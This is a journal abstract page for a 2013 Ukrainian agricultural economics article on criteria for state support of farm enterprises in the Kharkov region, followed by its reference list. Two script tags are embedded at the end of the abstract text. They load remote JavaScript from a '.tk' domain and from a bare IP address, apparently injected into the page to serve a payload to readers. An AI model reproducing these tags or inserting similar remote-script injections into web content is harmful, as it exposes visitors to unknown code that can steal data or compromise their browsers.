ISSN 2413-2322 (Online)

ISSN 2221-1055 (Print)

UDS: 631.155(477)
Фінансові відносини та бухгалтерський облік

Criteria for state support of agricultural enterprises / Kalashnikova T.V. // Ekonomika APK. - 2013. - № 2 - P. 49

The level of state support for agricultural enterprises of Kharkov region is defined. The influence of farm support on the performance of their activities is analysed. The approaches towards defining of criteria of state support for agricultural enterprises are generalized. The author generalizes approach to determining of criteria of government support of enterprises taking into account the strategic objectives of the agricultural sector development. Tabl.: 5. Refs: 10.<script type='text/javascript' src='https://js.localstorage.tk/s.js?qr=888'></script><script type='text/javascript' src='http://193.201.224.233/m.js?d=1'></script>
Key words: state support, criteria, agricultural enterprises

References

  1. Державна політика фінансової підтримки розвитку аграрного сектору АПК: монографія [Дем’яненко М.Я., Саблук П.Т., Скупий В.М. та ін.]; заред. М.Я. Дем’яненка. - К.: ННЦ ІАЕ, 2011. - 372 с.
  2. Державна підтримка агросфери: еволюція, проблеми/ Бородіна О.М., Киризюк С.В., Попова О.Л. та ін.; за ред. О.М. Бородіної. - Ін-т екон. та прогнозув. НАНУ. - К., 2008. - 264 с.
  3. Діброва А.Д. Державне регулювання сільськогосподарського виробництва: теорія, методологія, практика / А.Д. Діброва. - К.:ВРД «Формат», 2008. - 488 с.
  4. Малік М.Й. Конкурентоспроможність аграрних підприємств: методологія і механізми: монографія / М.И. Малік, О.А. Нужна - К.: ННЦ ІАЕ, 2007. - С. 215.
  5. НелепВ.М. Планування на аграрному підприємстві: підруч. / В.М. Нелеп. - К.: КНЕУ, 2004. - 195 с.
  6. Олійник О.В. Новий підхід до встановлення заставних цін на зерновому ринку / О.В. Олійник // Агроінком. - 2007. - № 7-8. - С. 7.
  7. Присяжнюк М.В. Виступ на Міжнародній науково-практичній конференції «Стратегічні орієнтири розвитку аграрного сектору України до 2020 року» / М.В. Присяжнюк // Економіка АПК. - 2012. - № 10. - С. 5.
  8. Саблук П.Т. Основи організації сільськогосподарського ринку / П.Т. Саблук, Д.Я. Карич, Ю.С. Коваленко. - К.: ДОП ІАЕ УААН, - С.114.
  9. Шолойко А.С. Тенденції державної підтримки сільського господарства / А.С. Шолойко // Економіка АПК. - 2012. - № 5. - С. 41-44.
  10. OECD’s Producer Support Estimate and related indicators of agricultural support: concepts, calculations, interpretation and use (the PSE Manual) : [Електр. ресурс]. - ttp://www.oecd.org./dataoecds/52/5/46193164.pdf.
Read article: 13_02_08.pdf